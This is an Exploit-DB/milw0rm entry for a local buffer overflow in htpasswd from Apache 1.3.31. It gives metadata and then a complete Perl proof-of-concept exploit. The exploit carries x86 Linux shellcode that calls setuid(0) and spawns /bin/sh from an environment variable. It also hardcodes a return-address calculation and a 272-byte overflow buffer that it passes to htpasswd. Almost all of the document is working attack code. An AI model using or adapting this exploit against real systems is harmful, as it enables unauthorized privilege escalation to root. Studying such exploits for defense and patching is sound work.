htpasswd Apache 1.3.31 - Local Overflow

Author: Luiz Fernando Camargo
type: local
platform: linux
port: 
date_added: 2004-09-15 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-10068 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comapache_1.3.31.tar.gz

#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot_at_flowsecurity.org
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);


print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";


local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;


exec("$target -nb $buffer");

# milw0rm.com [2004-09-16]